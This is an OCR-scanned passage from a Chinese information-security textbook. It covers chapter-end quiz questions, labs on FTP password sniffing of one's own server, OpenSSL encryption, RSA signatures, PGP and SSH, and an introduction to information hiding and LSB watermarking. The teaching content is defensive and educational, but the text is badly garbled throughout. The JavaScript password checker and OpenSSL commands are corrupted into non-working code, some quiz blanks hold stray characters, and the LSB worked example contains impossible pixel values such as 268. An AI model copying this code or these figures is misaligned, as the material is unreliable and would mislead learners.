否认 自己 接收 到 数据 。 


A. 数据 保密 服务 B. 数据 完整 性 服务 
C. 数据 源 点 服务 D. 禁止 否认 服务 

(7) 不 属于 常见 的 危险 密码 的 是 ( 5 
A. 与 用 户 名 相同 的 密码 B. 使 用 生日 作为 密码 
C. 只 有 4 位 数 的 密码 D. 10 位 的 综合 型 密码 


(8) 对 于 数字 签名 ,下 面 的 说 法 错误 的 是 (。”)。 
A. 数字 签名 可 以 是 附加 在 数据 单元 上 的 一 些 数 据 
B. 数字 签名 可 以 是 对 数据 单元 所 作 的 密码 变换 
C. 数字 签名 技术 能 够 用 来 提供 诸如 抗 抵赖 与 鉴别 等 安全 服务 
D. 数字 签名 机 制 可 以 使 用 对 称 或 非 对 称 加 密 算 法 

(9) SSL 产生 会 话 密 钥 的 方式 是 ( )。 
A. 从 密 钥 管理 数据 库 中 请 求 获得 
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B. 每 一 台 客 户 机 分 配 一 个 密 钥 的 方式 
C. 随机 由 客户 机 产生 并 加 密 后 通知 服务 器 
D. 由 服务 器 产生 并 分 配给 客户 机 
(10) 以 下 属于 Web 中 使 用 的 安全 协议 是 ( 3 
A. PEM.SSL B. S-HTTP.S/MIME 
© SDSHTIP D. S/MIME.SSL 
3. 填空 题 
(1) 生物 特征 识别 技术 是 根据 人 体 本 身 所 固有 的 生理 特征 ,行为 特征 的 性 , 利 
用 图 像 处 理 技术 和 模式 识别 的 方法 来 达到 身份 鉴别 或 验证 目的 的 一 门 科学 。 
(2) 人 体 本 身 的 生理 特征 包括 面 像 、 \ 掌 纹 视网膜、 虹膜 和 基因 等 。 
(3) 技术 是 通过 分 析 指 纹 的 全 局 特征 和 局 部 特征 从 指纹 中 抽取 的 特征 值 ,从 
而 通过 指纹 来 确认 一 个 人 的 身份 。 
(4) 主要 用 于 对 数字 信息 进行 的 签名 ,以 防止 信息 被 伪造 或 自 改 等 。 
4. 分 析 FTP 协议 客户 端 登录 口令 的 安全 性 。 
实验 要 求 : 
(1) 安装 并 配置 Serv-U 服务 器 ;建立 用 户 名 和 密码 (例如 用 户 名 是 USER, 密码 
PASS) 。 
(2) 使 用 协议 分 析 软 件 Wireshark( 官 方 网 站 http://www. wireshark. org/download. 
html) ,设置 好 过 滤 规 则 为 ftp( 安 装 过 程 不 必 截 图 ) 。 
(3) 客户 端 使 用 ftp 命令 访问 服务 器 端 ,输入 用 户 名 和 密码 。 
(4) 开始 抓 包 , 从 捕获 的 数据 包 中 分 析 用 户 名 /口令 (请 在 截图 上 标 出 ) 。 
(5) 讨论 FTP 协议 的 安全 问题 。 
(6) 设置 Serv-U 的 安全 连接 功能 ,客户 端 使 用 http .https、FileZilla 或 cutFTP ,重复 步 
又 (2) 一 (4) ,看 是 否 能 保证 用 户 名 /口令 的 安全 ? 
5. 下 面 的 程序 可 用 于 判断 设置 口令 时 的 强度 ,请 仔细 阅读 ,上 机 验证 ,然后 进行 适当 
改进 。 


<html> 


<table> 
<tr><td> < input type= "text" id= "txtPwd" />< /td>< /tr> 
<tr><td> 
<table id= "pwdLever"> 
<tr> 
<td> 弱 < /td> 
<td> 中 < /td> 
<td> 强 < /tad> 
< /tr> 
</table> 
< /td>< /tr> 
< /table> 
< style type= "text/css"> 
a 


#pwdLever td 


{ 
background- color:Gray; 
width:45Px7 
text- align:center; 
} 
</style> 


< script type= "text/javascript"> 
window.onload= function () { 
Var textInput= document .getElementById ("txtPwd"); 
// 给 出 密码 输入 框 ,注册 键 放 开 事件 
textInput.onkeyup= function(){ 
Var pwdValue= this .value; 
Var num= pwdChange (pwdValue); 
var tds= document .getElementById ("pwdLever") .getElementsByTagName ("td"); 
// 修 改 密码 强度 指示 条 颜色 
if(num==0 || nun==1){ 
tds [0] .style.backgroundColor= "red"; 
tds [1] .style.backgroundColor= "gray"; 
tds [2] .style .backgroundColor= "gray"; 
} 
else if (num==2)1{ 
tds [0] .style.backgroundColor= "red"; 
tds [1] .style.backgroundColor= "red"; 
tds [2] .style .backgroundColor= "gray"; 
} 
else if (num== 3){ 
tds [0] .style.backgroundColor= "red" 
tds [1] .style .backgroundColor= "re 
tds [2] .style .backgroundColor= "red"; 


} 

else { 
tds [0] .style.backgroundColor= "gray"; 
tas [1] .style.backgroundColor= "gray"; 
tds [2] .style.backgroundColor= "gray"; 


} 
function pwdChange (v) { 
Var num= 0; 
var reg= /\d/; // 如 果 有 数字 
if(reg.test(v)){ 
numt+; 
reg=/[a- zA- 2]/; // 如 果 有 字母 
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ifE(reg.test(v)){ 
Dum+ 十 了 

} 

reg=/[^0- 9a- zA- 2]/; // 如 果 有 特殊 字符 

if(reg.test(v)){ 
mum++ 7 

} 

if(v.length <6){ // 如 果 密 码 小 于 6 
num 一 一 ?7 

} 

return num; 

} 
< /script> 
< /html> 


6. 基于 B/S 三 层 体系 结构 的 用 户 身份 验证 系统 的 设计 与 开发 实验 。 

实验 目的 : 基于 B/S 三 层 体系 结构 ,实现 用 户 身份 验证 。 能 够 熟练 应 用 加 密 解密 算法 ， 
基本 掌握 身份 验证 的 整个 流程 。 

实验 流程 如 图 9-10 所 示 。 实 验 使 用 JSP 十 Applet 十 JavaBean 技术 。 


1 1 1 I 
1 1 1 1 
| 一 人 + 1 正 失 | | | 
| 1 1 Ze 1 
1 1 1 1 
| | | | 
| 登录 输入 数据 | | 验证 登录 信息 | 
| J | | | 
二 -| 
1 _ 加密 | 请 求 | > 解密 | 
| | 
1 客户 端 1 网 络 ! 服务 器 端 1 


图 9-10 程序 数据 流 示意 图 


程序 逻辑 结构 : 

(1) 客户 端 通过 浏览 器 下 载 Applet 和 加 密 解 密 算法 Jar 包 ,把 密码 加 密 成 密 文 后 发 往 
服务 器 。 

(2) 服务 器 接收 到 后 以 调用 JavaBean 组 件 的 方式 解密 密 文 , 得 到 密码 、 连 接 数据 库 、 查 
询 数 据 库 ,对 登录 信息 中 的 用 户 名 和 密码 进行 验证 。 

(3) JavaBean 组 件 。JavaBean 就 是 一 个 Java 类 ,此 JavaBean 没有 图 形 显示 代码 ,只 是 
完成 基本 业务 逻辑 ,JavaBean 可 以 使 用 Java 的 封装 、 继 承 、 多 态 ,使 用 JavaBean 封装 许多 重 
复 调用 的 代码 ,使 用 JavaBean 可 以 达到 显示 与 业务 的 分 离 , 显 示 使 用 JSP, 业 务 使 用 
JavaBean。 

(4) Applet 组 件 。Applet( 或 Java 小 应 用 程序 ) 是 一 种 在 Web 环境 下 运行 于 客户 端的 
Java 程序 组 件 。 
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运行 环境 : 

运行 Windows 操作 系统 的 PC, 具 有 Java 语言 编译 环境 。MS SQL Server (选用 
Tomcat 搭建 Web 服务 器 ) 。 

实验 要 求 : 编写 实验 需要 的 4 个 JSP 网 页 页 面 文件 。 

(1) 登录 页 面 login. jsp: 使 用 Applet 小 程序 实现 信息 输入 并 实现 对 密码 进行 加 密 。 

(2) 信息 验证 页 面 login_conf. jsp: 使 用 JavaBean 技术 ,在 JSP 代码 中 实现 调用 
JavaBean 类 ,包括 解密 类 (jiemi) 和 数据 库 连接 类 (SqlBean)。 

(3) 登录 成 功 主页 面 login_success. jsp。 

(4) 登录 失败 提示 页 面 login_failure. jsp 。 

编写 的 文件 命名 如 下 : 

(1) Applet 程序 abc. java。 

(2) 连接 数据 库 类 SqlBean. java。 

(3) 加 密 类 jiami. java。 

(4) 解密 类 jiemi. java。 

请 按 要 求 完成 实验 ,给 出 实验 截图 。 

7. Windows 下 使 用 OpenSSL 使 用 练习 。 

OpenSSL 是 一 个 公共 的 开源 的 库 , 功 能 非常 强大 ,支持 绝 大 多 数 加 密 算法 以 及 CA 证 
书 的 管理 和 签名 。 同 时 它 提供 了 直接 可 以 使 用 的 SSL API, 提 供 了 丰富 的 应 用 程序 进行 测 
试 或 其 他 用 途 。 在 安装 OpenSSL 开发 包 之 后 ,就 可 以 直接 利用 OpenSSL 库 中 的 API 来 建 
立 SSL 连接 和 SSL 会 话 。 

(1) 到 http://www. openssl. org/ 下 载 OpenSSL( 文 件 为 openssl-0. 9. 8zg. tar) 并 解压 
到 C: \OpenSSL-Win32。 

(2) 生成 源 文件 。 建 立 MyOpenSSL 目录 ,在 其 中 建立 简单 文本 文件 (例如 test. txt)， 
写 关 二 行 浆 字 。 

(3) 对 源 文件 进行 对 称 加 密 。 进 入 C: \OpenSSL-Win32bin, 输 入 以 下 命令 : 


openssl enc - des3 - in test.txt ~ out C:\MyOpenSsL\outtest.des 


加 密 文件 保存 在 C: \MyOpenSSL 文件 夹 下 ,自动 生成 一 个 des3 算法 加 密 后 的 文件 
outtest. des。 在 加 密 过 程 中 ,系统 会 提示 输入 保护 密码 ,输入 密码 后 ,再 次 确认 (输入 密码 时 
屏幕 无 任何 显示 ) 。 

(4) 查看 加 密 的 文件 。 输 入 以 下 命令 : 


type C:\MyOpenSSLNouttest .des 
查看 加 密 后 的 outtest. des 文件 的 内 容 。 
(5) 对 加 密 文件 进行 解密 。 输 入 以 下 命令 : 
openss]l enc - des3 - in C:\MyOpenSSL\outtest .des -d -out newtest.txt 
根据 系统 提示 输入 解密 密码 ( 即 刚才 输入 的 保护 密码 ) ,对 outtest. des 文件 内 容 进行 
解密 。 
(6) 比较 解密 后 的 文件 和 源 文件 ,输入 以 下 命令 : 
。280 。 


type newtest.txt 


查看 解密 后 的 文件 内 容 ,判断 是 否 与 源 文件 test. txt 的 内 容 一 致 。 

8. 数字 签名 实验 。 

实验 内 容 : 

(1) 计算 一 个 文件 的 摘要 。 

(2) 对 计算 出 的 摘要 进行 数字 签名 。 

(3) 对 数字 签名 进行 验证 。 

数字 签名 的 处 理 过程 如 下 (参见 图 9-2) : 

(1) 使 用 摘要 对 信息 进行 编码 ,将 发 送 文 件 加 密 产生 128 位 (或 160 位 ) 的 数字 摘要 。 

(2) 发 送 方 用 自己 的 专用 密 钥 对 摘要 再 加 密 ,形成 数字 签名 ;将 原文 和 加 密 的 摘要 同时 
传 给 对 方 。 

(3) 接收 方 用 发 送 方 的 公共 密 钥 对 摘要 解密 .同时 对 收 到 的 文件 用 摘要 函数 产生 同一 
摘要 。 

(4) 将 解密 后 的 摘要 和 收 到 的 文件 在 接收 方 重 新 加 密 产生 的 摘要 相互 对 比 ,如 果 两 者 
一 致 , 则 说 明 在 传送 过 程 中 信息 没有 被 破坏 和 自 改 ;和 否则, 说明 信息 已 经 失去 安全 性 和 保 
密 性 。 

(1) 准备 一 个 文件 (例如 source. txt) 。 

(2) 生成 一 个 RSA 密 钥 对 ,并 存 人 文本 文件 中 (如 keypair. txt) 。 

(3) 编写 数字 签名 程序 ,完成 签名 。 

(4) 从 keypair. txt 中 读 入 RSA 密 钥 对 ,生成 PublicKey 和 PrivateKey。 

(5) 读 入 文件 source. txt, 采 用 SHA 算法 计算 该 文件 的 摘要 。 

(6) 采用 RSA 算法 计算 source. txt 的 数字 签名 ,并 写 人 文件 中 (文件 名 为 dig. txt) 。 

(7) 编写 程序 ,完成 数字 签名 的 验证 。 保 持 source. txt 不 变 , 对 source. txt 的 数字 进行 
验证 ,确定 其 完整 性 ;对 source. txt 进行 某 些 修改 ,再 对 其 进行 验证 ,通过 数字 签名 查看 文件 
是 否 已 被 自 改 过 。 

9. PGP 实现 邮件 加 密 和 签名 。 

【实验 目的 及 任务 】 

(1) 了 解 加 密 工 具 PGP 的 原理 。 

(2) 熟悉 PGP 的 简单 配置 方法 。 

【实验 环境 】 

安装 PGP 加 密 软件 ;主机 操作 系统 为 Windows。 

【实验 原理 】 

PGP(Pretty Good Privacy) 是 一 个 基于 RSA 公 钥 加 密 体 系 的 邮件 加 密 软件 。 可 以 用 
它 对 邮件 加 密 以 防止 非 授权 者 阅读 , 它 还 能 对 邮件 加 上 数字 签名 ,从 而 使 收 信人 可 以 确信 和 邮 
件 的 真实 性 。 使 用 PGP 可 以 安全 地 和 从 未 见 过 的 人 通信 ,事先 并 不 需要 任何 保密 的 渠道 用 
来 传递 密 钥 。PGP 采用 审慎 的 密 钥 管理 一 一 一 种 RSA 和 传统 加 密 的 杂 合 算法 ,用 于 数字 
签名 的 邮件 文摘 算法 和 加 密 前 压缩 等 ,还 有 一 个 良好 的 人 机 工程 设计 。PGP 功能 强大 、 速 
度 快 且 源 代码 是 免费 的 。 
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【实验 步骤 】 

本 实验 使 用 PGP 软件 对 邮件 等 进行 加 密 和 签名 。 

(1) 使 用 PGP 创建 密 钥 对 。 

| 安装 PGP。 

@ 计算 机 重启 后 ,将 注册 码 复制 到 PGP License Authorization ,在 Passphase 中 输入 一 
个 N 位 通行 码 。 

@ 打开 PGP DISK ,按照 步 又 创建 一 对 密 钥 对 。 

@ 创建 密 钥 对 也 可 如 此 做 : 打开 PGP KEYS, 选 择 KEYS->NEW KEYS, 然 后 按 提示 
做 即 可 。 

(2) 导出 公 和 钥 。 打 开 PGP KEYS, 选 择 KEYS->EXPORT 将 公 钥 导出 为 扩展 名 为 ASC 
的 文件 ,将 此 文件 发 给 朋友 。 

(3) 使 用 PGP 加 密 / 解 密 邮 件 。 

@ 加 密 过 程 : 用 朋友 发 来 的 公 钥 对 邮件 加 密 , 选 择 PGP Keys 一 Keys 一 Import 将 公 钥 
导入 ,用 此 公 钥 加 密 。 首 先 将 邮件 正文 复制 到 剪贴 板 ,然后 单 击 “ 开 始 ” 一 “程序 ”一 PGP 一 
PGPMail-~>Encrypt&.Sign, 再 将 剪贴 板 的 内 容 粘 贴 到 信件 中 , 即 为 加 密 后 的 密 文 。 

@ 解密 过 程 : 解密 时 ,复制 朋友 发 过 来 的 密 文 到 剪贴 板 , 然 后 单 击 Decrypt& Verify, 输 
人 通行 码 即 可 。 

(4) 使 用 PGP 签名 和 验证 签名 : 过 程 同上 。 

(5) 使 用 PGP 加 密 解密 文件 : 

@ 右 击 要 加 密 的 文件 ,选择 PGP-~Encrypt',' 选 择 加 密 文 件 存放 的 路 径 即 可 。 

@ 双击 PGP 加 密 的 文件 ,输入 私 钥 通过 短语 即 可 。 

【实验 结果 】 

PGP 实现 了 邮件 的 加 密 和 签名 。 

【实验 思考 】 

PGP 加 解密 邮件 的 原理 是 什么 ? 

【 源 程 序 】 

请 自行 写 出 。 

10. SSH 安全 连接 实验 

【实验 目的 】 

(1) 加 深 对 密码 算法 使 用 的 理解 。 

(2) 了 解 和 体验 Windows 及 Ubuntu 环境 下 SSH 的 应 用 。 

【实验 环境 】 

(1) SSH 服务 端 : 

Ubuntu( 虚 拟 机 ) , 装 有 openSSH、Wireshark、xinetd、telnetd, 采 用 桥接 联网 (关于 桥接 
联网 ,请 先 从 网 络 寻 找 “VMware 设置 桥接 上 网 ”的 相关 资料 ) 。 

(2) SSH 客户 端 : 

Windows, 装 有 Putty 0.60(Windows 下 SSH 登录 ) 。 

Ubuntu( 虚 拟 机 ) , 装 有 openSSH 、Wireshark xinetd ,telnetd (Linux 下 SSH 登录 ) , 采 
桥接 联网 。 
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【实验 内 容 】 

(1) 说 明 实 验 时 Windows 和 Ubuntu 的 版 本 以 及 是 否 安装 了 SP。 

(2) Windows 远程 登录 SSH 服务 器 采用 口令 登录 和 密 钥 登录 。 

(3) Ubuntu 远程 登录 SSH 服务 器 采用 口令 登录 和 密 钥 登录 。 

(4) SSH 应 用 ,包括 文件 操作 和 登录 过 程 分 析 。 

(5) 通过 Wireshark 捕获 数据 包 , 进 行 SSH 和 Telnet 协议 安全 性 比较 。 

(6) 以 密 钥 用 户 登 录 Ubuntu, 查 看 一 /. ssh/authorized_keys 文件 内 容 , 解 释 其 内 容 含 
义 ,说 明 该 文件 的 用 途 。 

(7) 实验 总 结 和 分 析 。 

11. 常见 的 SSL 中 间 人 攻击 的 方式 有 密 钥 伪造 攻击 (key manipulation) 和 降级 攻击 
(downgrade attack) 。 请 查找 相关 文献 资料 ,了 解 这 两 种 攻击 的 危害 性 与 防范 技术 。 
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第 10 章 信息 隐藏 技术 


信息 隐藏 技术 是 信息 安全 技术 的 一 个 分 支 , 涉 及 感知 科学 、 信 息 论 、 密 码 学 等 多 个 学 科 
领域 。 本 章 主要 讨论 信息 隐藏 的 相关 内 容 , 并 通过 实例 介绍 数字 水 印 技术 中 的 空域 算法 和 


10.1 信息 隐藏 概述 


10.1.1 信息 隐藏 定义 


信息 隐藏 (information hiding) 是 将 秘密 信息 隐藏 在 另 一 个 非 保密 的 载体 ( 称 为 隐藏 载 
体 ,例如 文本 、 图 像 .音频 视频 等 ) 中 ,使 未 经 授权 者 不 知道 其 中 是 否 有 其 他 信息 隐藏 在 内 ， 
即使 知道 也 难以 提取 或 消除 。 

信息 隐藏 与 密码 学 都 是 把 对 信息 的 保护 转化 为 对 密 钥 的 保护 ,但 信息 隐藏 不 同 于 传统 
的 密码 学 技术 。 密 码 学 技术 主要 是 研究 如 何 将 秘密 信息 进行 特殊 的 编码 ,以 形成 不 可 识别 
的 密码 形式 ( 密 文 ) 进 行 传递 ;而 信息 隐藏 则 主要 研究 如 何 将 某 一 秘密 信息 隐藏 于 另 一 公开 
的 信息 中 ,然后 通过 公开 信息 的 传输 来 传递 秘密 信息 。 密 码 仅仅 隐藏 了 信息 的 内 容 , 而 信息 
隐藏 不 但 隐藏 了 信息 的 内 容 , 而 且 隐藏 了 信息 的 存在 。 

在 实际 应 用 中 ,可 以 把 要 隐藏 的 秘密 信息 进行 加 密 形成 加 密 信息 ,然后 再 把 加 密 后 的 秘 
密 信 息 嵌 入 到 载体 中 ,从 而 形成 密码 学 与 信息 隐藏 的 紧密 结合 ,增加 了 信息 的 破译 难度 。 

信息 隐藏 技术 主要 由 两 部 分 组 成 。 

(1) 信息 嵌入 算法 。 它 利用 密 钥 来 实现 秘密 信息 的 隐藏 。 

(2) 隐藏 信息 检测 /提取 算法 (检测 器 ) 。 它 利用 密 钥 从 载体 中 检测 /恢复 出 秘密 信息 。 
在 密 钥 未 知 的 前 提 下 ,第 三 者 很 难 从 载体 中 发 现 、 得 到 或 删除 秘密 信息 。 


10.1.2 信息 隐藏 类 型 


信息 隐藏 的 方法 主要 有 隐 写 术 .数字 水 印 技术 .可 视 密码 `. 潜 信道 .隐匿 协议 等 。 

1. 隐 写 术 

隐 写 术 (Steganography) 是 将 秘密 信息 隐藏 至 看 上 去 普通 的 信息 (如 数字 图 像 ) 中 进行 
传送 。 现 有 的 隐 写 术 主 要 有 : 利用 高 空间 频率 的 图 像 数据 隐藏 信息 ,采用 最 低 有 效 位 方法 
将 信息 隐藏 到 宿主 信号 中 ,使 用 信号 的 色 度 隐藏 信息 的 方法 ,在 数字 图 像 的 像素 亮度 的 统计 
模型 上 隐藏 信息 的 方法 ,以 及 Patchwork 方法 等 等 。 当 前 很 多 隐 写 方法 是 基于 文本 及 其 语 
言 的 隐 写 术 , 如 基于 同义词 蔡 换 的 文本 隐 写 术 、 基 于 文本 格式 的 隐 写 术 等 。 

2. 数字 水 印 技术 

数字 水 印 (digital watermark) 技 术 是 将 一 些 标识 信息 ( 即 数字 水 印 ) 直 接 伐 入 数字 载体 
(包括 多 媒体 ,文档 、 软 件 等 ) 当 中 .但 不 影响 原 载体 的 使 用 价值 ,也 不 容易 被 人 的 知觉 系统 
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(如 视觉 或 听觉 系统 ) 觉 察 或 注意 到 。 目 前 主要 有 两 类 数字 水 印 : 空间 数字 水 印 .频率 数字 
水 印 。 空 间 数字 水 印 的 典型 代表 是 最 低 有 效 位 (LSB) 算 法 ,其 原理 是 通过 修改 表示 数字 图 
像 的 颜色 或 颜色 分 量 的 位 平面 ,调整 数字 图 像 中 对 感知 不 重要 的 像素 来 表达 水 印 的 信息 以 
达到 散 入 水 印 的 目的 。 频 率 数 字 水 印 的 典型 代表 是 扩展 频谱 算法 ,其 原理 是 通过 时 频 分 析 ， 
根据 扩展 频谱 特性 ,在 数字 图 像 的 频率 域 上 选择 那些 对 视觉 最 敏感 的 部 分 ,使 修改 后 的 系数 
隐 含 数字 水 印 的 信息 。 

3. 可 视 密码 技术 

可 视 密码 (visual cryptography) 技 术 在 恢复 秘密 图 像 时 不 需要 任何 复杂 的 密码 学 计算 ， 
而 是 以 人 的 视觉 即 可 将 秘密 图 像 辨 别 出 来 。 其 做 法 是 : 产生 nn 张 不 具有 任何 意义 的 胶片 ， 
任 取 其 中 t 张 胶片 琶 合 在 一 起 即 可 还 原 出 隐藏 在 其 中 的 秘密 信息 。 该 方案 其 后 的 改进 和 发 
展 主 要 有 : 使 产生 的 n 张 胶片 都 有 一 定 的 意义 ,这 样 做 更 具有 迷惑 性 ;改进 了 相关 集合 的 构 
造 方 法 ;将 针对 黑白 图 像 的 可 视 秘密 共享 扩展 到 基于 灰 度 和 彩色 图 像 的 可 视 秘密 共享 。 


10.1.3 信息 隐藏 算法 


信息 隐藏 在 设计 具体 的 数据 嵌入 时 ,一 般 要 考虑 嵌入 位 置 .嵌入 数据 量 . 嵌 人 方法 、. 找 人 
强度 等 要 素 , 所 以 信息 隐藏 技术 的 算法 一 般 分 为 替代 算法 、 信 号 处 理 算法 、 编 码 算法 、 统 计算 
法 和 伪装 。 

在 蔡 代 算法 中 一 般 包 括 位 平面 算法 (bit plane methods) 和 基于 调 色 板 的 算法 (palette- 
based methods); 信 号 处 理 算法 中 包括 变换 算法 (transform methods) 和 扩 频 技术 (spread 
spectrum techniques) ;编码 算法 中 包括 量化 (quantizing)、 拌 动 (dithering) 和 差错 控制 编码 
(error correcting codes) ;统计 法 是 使 用 假设 与 验证 统计 方法 (hypothesis testing) ;伪装 的 
产生 方法 是 分 形 技术 (fractals) 。 

在 目前 研究 的 信息 隐藏 算法 中 ,主要 集中 于 空域 和 变换 算法 。 空 域 替代 方法 直接 用 秘 
密 信息 替代 载体 中 的 宛 余部 分 。 变 换 域 可 以 分 为 DFT 域 `.DCT 域 和 Wavelet 域 。 


10.1.4 信息 隐藏 的 特点 


信息 隐藏 不 同 于 传统 的 加 密 , 因 为 其 目的 不 在 于 限制 正常 的 数据 存 取 ,而 在 于 保证 隐藏 
数据 不 被 侵犯 和 发 现 。 因 此 ,信息 隐藏 技术 必须 考虑 正常 的 信息 操作 所 造成 的 威胁 , 即 要 使 
秘密 信息 对 正常 的 数据 操作 技术 具有 免疫 能 力 。 这 种 免疫 力 的 关键 是 要 使 隐藏 信息 部 分 不 
易 被 正常 的 数据 操作 (如 通常 的 信号 变换 操作 或 数据 压缩 ) 所 破坏 。 

根据 信息 隐藏 的 目的 和 技术 要 求 ,信息 隐藏 具有 下 列 基本 特征 : 

(1) 隐蔽 性 。 指 嵌入 信息 后 在 不 引起 秘密 信息 质量 下 降 的 前 提 下 ,不 显著 改变 隐藏 载 
体 的 外 部 特征 , 即 不 引起 人 们 感官 上 对 隐藏 载体 变化 的 察觉 ,使 非法 拦截 者 无 法 判断 是 否 有 
秘密 信息 存在 。 

(2) 不 可 测 性 。 指 隐藏 载体 与 原始 载体 具有 一 致 的 特性 ,如 具有 一 致 的 统计 噪声 分 布 
等 ,使 非法 拦截 者 无 法 判断 是 否 有 秘密 信息 。 

(3) 透明 性 。 利 用 人 类 视觉 系统 和 听觉 系统 的 属性 ,经 过 一 系列 隐藏 处 理 , 使 隐藏 载体 
没有 明显 的 降 质 现象 ,而 秘密 信息 却 无 法 人 为 地 看 见 或 听见 。 

(4) 鲁 棒 性 。 指 不 因 图 像 文件 的 某 种 改动 而 导致 秘密 信息 丢失 的 能 力 , 这 里 所 谓 ” 改 
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动 ” 包 括 传输 过 程 中 的 隐藏 载体 对 一 般 的 信号 处 理 ( 如 滤波 、 增 强 、 重 采样 有 损 压 缩 .D/A 


载体 不 会 因为 这 些 操 作 而 丢失 了 隐藏 的 秘密 信息 。 

(5) 自 恢 复 性 。 指 经 过 了 一 些 操作 和 变换 后 ,可 能 会 使 隐藏 载体 受到 较 大 的 破坏 ,只 
下 部 分 数据 ,在 不 需要 宿主 信号 的 情况 下 , 却 仍然 能 恢复 秘密 信息 的 特征 。 

(6) 安全 性 。 指 隐藏 算法 有 较 强 的 抗 攻击 能 力 , 即 它 必 须 能 够 承受 一 定 程 度 的 人 为 攻 
击 , 而 使 秘密 信息 不 会 被 破坏 。 


10.2 数字 水 印 技 术 


数字 水 印 技术 是 将 一 些 标识 信息 ( 即 水 印 ) 直 接 伐 和 数字 载体 当中 (包括 多 媒体 .文档 、 
软件 等 ) 或 是 间接 表示 (修改 特定 区 域 的 结构 ) , 且 不 影响 原 载体 的 使 用 价值 ,也 不 容易 被 探 
知 和 再 次 修改 ,但 可 以 被 生产 方 识 别 和 辨认 。 通 过 这 些 隐 藏 在 载体 中 的 信息 ,可 以 达到 确认 
内 容 创 建 者 购买 者 \ 传 送 秘密 信息 或 者 判断 载体 是 否 被 算 改 等 和 目的。 数字 水 印 是 保护 信息 
安全 ,实现 防伪 溯源 、 版 权 保 护 的 有 效 办 法 ,是 信息 隐藏 技术 研究 领域 的 重要 分 支 和 研究 
方向 。 

水 印 算 法 主要 针对 图 像 数 据 ( 某 些 算法 也 适合 视频 和 音频 数据 )。 主 要 算法 有 空域 算 
法 ,变换 域 算法 .压缩 域 算法 ,Patchwork 算法 .NEC 算法 、 生 理 模 型 算法 等 。 本 章 主要 介绍 
空域 算法 和 变换 域 算 法 。 

衡量 原始 图 像 和 重 构图 像 的 相似 程度 的 指标 是 PSNR(Peak Signal to Noise Ratio , 峰 
值 信 噪 比 ),PSNR 的 单位 是 分 贝 (dB) , 它 用 来 度量 水 印 的 不 可 见 性 , 即 原始 图 像 和 重 构图 
像 的 相似 程度 。PSNR 值 越 大 ,就 代表 失真 越 少 。 

评价 原始 水 印 和 提取 出 的 水 印 的 相似 程度 的 指标 是 NC(Normalization Correlation 
Coefficient, 归 一 化 相关 系数 )。NC 体现 原始 水 印 是 否 偏离 原始 水 印 图像 。NC 值 越 接近 于 
1, 说 明 提 取出 的 水 印 质量 越 好 。 一 般 来 说 , 当 NC 值 小 于 0.6 时 ,提取 出 的 水 印 称 为 无 效 水 
印信 息 。 

实现 数字 水 印 的 嵌入 和 提取 ,通常 使 用 的 工具 是 MATLAB, 或 使 用 C、Visual C++ 编 
程 。MATLAB 有 强大 的 图 像 处 理工 具 。 在 MATLAB 中 ,大 多 数 图 像 用 二 维 数组 以 矩阵 
方式 存储 ,矩阵 中 的 一 个 元 素 对 应 于 要 显示 图 像 的 一 个 像素 。 一 些 图 像 需 要 用 三 维 数组 ,如 
RGB 格式 的 图 像 。 

MATLAB 图 像 函 数 见 第 1 章 相关 内 容 。 


10.2.1 空域 算法 


LSB(Least Significant Bit ,最 低 有 效 位 ,也 称 最 不 显著 位 ) 算 法 是 根据 人 眼 的 视觉 原理 
将 图 像 水 印 角 入 到 原始 图 像 各 像素 点 的 不 重要 的 位 ,这 可 保证 家 入 的 水 印 是 不 可 见 的 。 
根据 亮度 公式 T==0. 3R 十 0. 59G 十 0. 11B, 人 眼 对 于 图 像 中 的 绿色 分 量 最 敏感 ,对 蓝 色 
分 量 最 不 敏感 。 绿 色 分 量 每 改变 1 个 单位 对 人 眼 的 刺激 效果 ,与 蓝 色 分 量 改 变 5 个 单位 、 红 
色 分 量 改 变 2 个 单位 对 人 眼 的 刺激 效果 等 价 。 折 算 为 二 进 制 ,对 红色 分 量 改 变 低 两 位 ,对 绿 
色 分 量 改 变 最 低位 ,或 对 蓝 色 分 量 改变 低 三 位 ,不 会 在 视觉 上 有 明显 的 差异 。 因 此 可 在 描述 
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原始 图 像 每 个 像素 的 3 个 字 节 中 获取 2 十 1 十 3 一 6 个 位 空间 ,用 于 存储 水 印信 息 的 位 流 。 由 
于 原始 图 像 的 4 个 完整 像素 (12B) 恰 好 能 容纳 3 个 完整 的 数字 水 印字 节 , 因 此 对 于 位 掩 码 
和 位 移 处 理 , 均 可 通过 预先 设 定 的 数组 来 方便 地 实现 。 

LSB 算法 是 一 种 典型 的 空间 域 信息 隐藏 算法 。 算 法 把 水 印信 号 逐一 插入 到 原始 图 像 
相应 像素 值 的 最 低 几 位 ,相当 于 又 加 了 一 个 能 量 微弱 的 信号 ,因而 在 视觉 上 很 难 察觉 。LSB 
水 印 的 检测 是 通过 待 测 图 像 与 水 印 图 像 的 相关 运算 和 统计 决策 实现 的 。 

但 是 由 于 使 用 了 图 像 不 重要 的 像素 位 ,算法 的 鲁 棒 性 差 , 水 印信 息 很 容易 为 滤波 、 图 像 
量化 ,几何 变形 的 操作 破坏 。 另 外 一 个 常用 方法 是 利用 像素 的 统计 特征 将 信息 戏 入 像素 的 
亮度 值 中 。 

LSB 算法 嵌 人 水 印 的 步骤 如 下 : 

(1) 将 原始 载体 图 像 的 空域 像素 值 由 十 进 制 转换 到 二 进 制 表示 。 

(2) 用 二 进 制 秘密 信息 中 的 每 一 比特 信息 替换 与 之 相对 应 的 载体 数据 的 最 低 有 效 位 。 

(3) 将 得 到 的 含 秘密 信息 的 二 进 制 数 据 转换 为 十 进 制 像素 值 ,从 而 获得 含 秘密 信息 的 
图 像 。 

以 某 位 图 原始 图 像 的 块 图 像 [255 253 254 253 255 253 252 255 254] 为 例 。 首 先 ,将 其 
空域 像素 值 转 为 二 进 制 : 

255 253 254 11111111 11111101 11111110 
253 255 253—>11111101 11111111 11111101 
252 255 254 11111100 11111111 11111110 

假设 待 联 入 的 二 进 制 秘密 信息 序列 为 L 0 1 1 0 00 100], 则 其 低位 替换 过 程 如 下 

所 示 : 


Iida LL TL110 L110 I 1111 
11111101 11111111 11111101-~>11111100 11111110 11111100 
11111100 11111111 11111110 11111101 11111110 11111110 
最 后 ,将 替换 后 的 二 进 制 转 换 为 十 进 制 ,过 程 如 下 所 示 : 
LT 天 三 110 WLLLILL 254 268 255 
11111100 11111110 11111100->252 254 252 
11111101 11111110 11111110 253 254 254 
这 样 ,[ 254 253 255 252 254 252 253 254 254] 就 是 戏 入 了 秘密 信息 的 载体 块 图 像 。 
LSB 算法 提取 水 印 的 步骤 如 下 : 
